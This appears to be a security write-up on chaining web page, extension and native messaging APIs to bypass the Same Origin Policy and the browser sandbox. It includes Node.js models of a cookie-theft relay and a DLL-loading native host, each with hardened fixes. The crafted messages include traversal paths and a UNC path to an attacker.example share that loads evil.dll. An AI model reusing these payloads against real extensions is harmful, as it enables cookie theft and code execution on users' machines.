The researchers demonstrate a technique they call universal code execution (UCE): by chaining the messaging APIs of web pages, browser extensions and native messaging hosts, a web page can bypass both the Same Origin Policy and the browser sandbox. The chain leverages browser extension APIs and the native messaging protocol, and builds on a previously known pattern in which messages are relayed from a web page, through an extension, to a native application.
Browser extensions use content scripts to interact with web pages. Content scripts run in an isolated world, separate from the page's own JavaScript, for security reasons. To perform privileged tasks, a content script communicates with the extension's background script through message-passing APIs such as chrome.runtime.sendMessage. The background script listens with chrome.runtime.onMessage.addListener and can respond with data. This runtime messaging channel is restricted to components of the same extension (unless the extension explicitly opts in through externally_connectable), again for security reasons.
Content scripts do not reach web pages through runtime messaging; they share the page's window, so the page and the content script exchange data with window.postMessage. Although postMessage was designed for cross-window messaging, a content script that registers a "message" event listener receives every message posted to that window, including messages from the page itself. The vulnerability arises when that listener does not validate event.origin (and event.source) before acting on the message. If the extension injects its content script into every site (a wildcard match pattern) and the listener accepts messages from any origin, a malicious web page can use this channel to drive the extension: it can abuse the extension's privileges, or have the extension inject attacker-chosen content into the page.
Consider an extension that injects its content script into all pages and holds the cookies permission for a small set of whitelisted domains. A malicious web page can exploit the content-script to background-script channel to steal cookies from those domains. The page posts a message to the content script requesting the cookies of a whitelisted domain; the content script relays the request to the background script, which retrieves the cookies through the cookies API, and the result travels back down the same path to the page. The page has now read cookies belonging to a different origin, so the Same Origin Policy has been bypassed.
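The cookie-stealing chain just described, as an added example that is not code from the original research or from the affected extension. It is a Node-runnable model of page -> content script -> background script -> cookies API: the `win`, `sender` and `cookieStore` objects are constructed stand-ins for the browser's window, chrome.runtime.MessageSender and chrome.cookies (the real calls are asynchronous; the model is synchronous for clarity), and the domain `bank.example` and origin `https://attacker.example` are hypothetical. The vulnerable content script relays any window message to the background and the vulnerable background answers for whatever domain the message names; the hardened variants check `event.source` and `event.origin`, accept only a fixed request shape, and derive the domain from `sender.url` rather than from the message.

```javascript
// Added example (not from the original write-up): model of the page -> content script
// -> background -> cookies chain, with vulnerable and hardened variants of each hop.

const WHITELISTED_DOMAIN = "bank.example";          // hypothetical site the extension supports
const ATTACKER_ORIGIN = "https://attacker.example"; // hypothetical malicious page

// Stand-in for chrome.cookies.getAll({domain}); only the whitelisted domain has a cookie.
const cookieStore = {
  getAll({ domain }) {
    return domain === WHITELISTED_DOMAIN
      ? [{ name: "session", value: "s3cr3t", domain }]
      : [];
  },
};

// Vulnerable background script: returns cookies for whatever domain the message names.
function vulnerableBackground(msg, _sender) {
  if (msg?.type !== "getCookies") return undefined;
  return cookieStore.getAll({ domain: msg.domain });
}

// Hardened background script: the domain is derived from sender.url, which Chrome fills
// in from the content script's frame, so a page can only ever ask about itself.
function hardenedBackground(msg, sender) {
  if (msg?.type !== "getCookies") return undefined;
  const domain = new URL(sender.url).hostname;
  if (domain !== WHITELISTED_DOMAIN) return [];
  return cookieStore.getAll({ domain });
}

// Content-script factory. `win` is the page window the script shares; `background`
// stands in for chrome.runtime.sendMessage delivering to the background listener.
function makeContentScript(win, background, { validate }) {
  const expectedOrigin = `https://${WHITELISTED_DOMAIN}`;
  return function onWindowMessage(event) {
    if (validate) {
      if (event.source !== win) return undefined;              // posted by this window, not a frame
      if (event.origin !== expectedOrigin) return undefined;   // only the site the extension serves
      if (event.data?.type !== "getCookies") return undefined; // fixed request shape, no passthrough
    }
    // Chrome sets MessageSender.url to the URL of the page the content script runs in.
    const sender = { url: `${event.origin}/` };
    // The vulnerable extension posts the reply back with event.source.postMessage(reply, "*"),
    // handing the cookies to the page; here the reply is simply returned.
    return background(event.data, sender);
  };
}

// Drive the chain as a page at `pageOrigin` calling window.postMessage on its own window.
function simulate(pageOrigin, validate, background) {
  const win = {};
  const onMessage = makeContentScript(win, background, { validate });
  const request = { type: "getCookies", domain: WHITELISTED_DOMAIN }; // constructed crafted message
  return onMessage({ origin: pageOrigin, source: win, data: request });
}

function cookieNames(result) {
  return Array.isArray(result) ? result.map((c) => c.name) : result;
}

// All four combinations: only the fully vulnerable chain leaks the session cookie to the attacker.
function demo() {
  return {
    vulnerableChain: cookieNames(simulate(ATTACKER_ORIGIN, false, vulnerableBackground)),
    hardenedContentScript: cookieNames(simulate(ATTACKER_ORIGIN, true, vulnerableBackground)),
    hardenedBackground: cookieNames(simulate(ATTACKER_ORIGIN, false, hardenedBackground)),
    legitimatePage: cookieNames(simulate(`https://${WHITELISTED_DOMAIN}`, true, hardenedBackground)),
  };
}
```

Either hardened hop alone stops the leak, but the fixes are not interchangeable: the origin check on the content script keeps untrusted pages out of the channel entirely, while the sender-derived domain in the background removes the page's ability to choose which origin's cookies are read even if the relay is later loosened.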
Extensions can also use native messaging to communicate with native applications installed on the user's computer. A malicious web page can turn this into code execution against a benign but vulnerable extension whose content script is injected into every page through a wildcard match. The page posts a message to the content script, the content script relays it to the background script, and the background script forwards it to the native application through chrome.runtime.sendNativeMessage. If the native application's message handler does not validate what it receives, the web page ends up with arbitrary code execution on the user's machine, outside the browser sandbox.
Spaceraccoon reports that a PKI smart card extension with a large user base was vulnerable to command execution in exactly this way. The extension injects a content script that, because of a permissive wildcard configuration, listens for messages from any web page. The content script passes the message to the background script, which forwards it to the extension's native application. The native application's message validation is weak, so an attacker who sends a crafted message containing a malicious DLL path obtains arbitrary code execution.
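The last hop of the chain, background script to native application, as an added example serving the two preceding passages; it is not code from the original research or from the affected extension. Only the wire format is real: Chrome's native messaging protocol frames each message as a 32-bit length in native byte order followed by UTF-8 JSON on the host's stdin. The `{action: "load", module}` request, the `C:\Program Files\PKIHost\modules` directory, the module allowlist and the DLL-loading behaviour are hypothetical stand-ins, since the page does not give the real extension's message format. The "weak" host shows the kind of validation that fails against a crafted path: it rejects `..` but accepts absolute and UNC paths; the hardened host never uses the page-controlled string as a path at all.

```javascript
// Added example (not from the original write-up): background -> sendNativeMessage -> host,
// with Chrome's native messaging framing and a weak versus a hardened host-side validator.

const MODULE_DIR = "C:\\Program Files\\PKIHost\\modules";   // hypothetical install directory
const KNOWN_MODULES = new Set(["reader-pkcs11", "vendor-pkcs11"]); // hypothetical allowlist

// Chrome writes each message to the host's stdin as <u32 length><UTF-8 JSON>.
function encodeNativeMessage(obj) {
  const body = Buffer.from(JSON.stringify(obj), "utf8");
  const frame = Buffer.alloc(4 + body.length);
  frame.writeUInt32LE(body.length, 0); // native byte order: little-endian on x86/ARM hosts
  body.copy(frame, 4);
  return frame;
}

// Host-side read of one frame; refuses short or truncated input instead of parsing garbage.
function decodeNativeMessage(frame) {
  if (frame.length < 4) throw new Error("short frame");
  const len = frame.readUInt32LE(0);
  if (frame.length < 4 + len) throw new Error("truncated frame");
  return JSON.parse(frame.subarray(4, 4 + len).toString("utf8"));
}

// Weakly validated host (hypothetical): a ".." denylist is meant to keep the module inside
// MODULE_DIR, but an absolute or UNC path contains no ".." and is passed straight to the loader.
function weakHost(frame) {
  const req = decodeNativeMessage(frame);
  if (req.action !== "load") return { error: "unknown action" };
  if (typeof req.module !== "string" || req.module.includes("..")) return { error: "rejected" };
  return { loaded: req.module }; // stand-in for LoadLibrary(req.module)
}

// Hardened host: the page-controlled string is only a key into a fixed allowlist, and the
// DLL path is built by the host from its own install directory.
function hardenedHost(frame) {
  const req = decodeNativeMessage(frame);
  if (req.action !== "load") return { error: "unknown action" };
  if (typeof req.module !== "string" || !KNOWN_MODULES.has(req.module)) {
    return { error: "module not allowed" };
  }
  return { loaded: `${MODULE_DIR}\\${req.module}.dll` };
}

// Vulnerable background script: forwards whatever the content script relayed, unchanged.
// In the real extension this is chrome.runtime.sendNativeMessage(hostName, msg, cb); the host
// cannot tell a page-originated request from a legitimate one, so validation must happen here
// or in the host.
function backgroundForward(host, msgFromContentScript) {
  return host(encodeNativeMessage(msgFromContentScript));
}

// Constructed crafted messages, as a malicious page would post through the relay chain.
const TRAVERSAL = { action: "load", module: "..\\..\\Users\\Public\\evil" };
const ABSOLUTE = { action: "load", module: "C:\\Users\\Public\\evil.dll" };
const UNC = { action: "load", module: "\\\\attacker.example\\share\\evil.dll" };
const LEGIT = { action: "load", module: "reader-pkcs11" };

function demo() {
  return {
    weakTraversal: backgroundForward(weakHost, TRAVERSAL),
    weakAbsolute: backgroundForward(weakHost, ABSOLUTE),
    weakUnc: backgroundForward(weakHost, UNC),
    hardenedAbsolute: backgroundForward(hardenedHost, ABSOLUTE),
    hardenedUnc: backgroundForward(hardenedHost, UNC),
    hardenedLegit: backgroundForward(hardenedHost, LEGIT),
  };
}
```

The framing helpers are also the place to watch on the host side in real code: a host that reads the length prefix and then trusts it blindly, or that parses a partial read, adds a second bug class on top of the validation problem, which is why `decodeNativeMessage` checks the frame length before parsing.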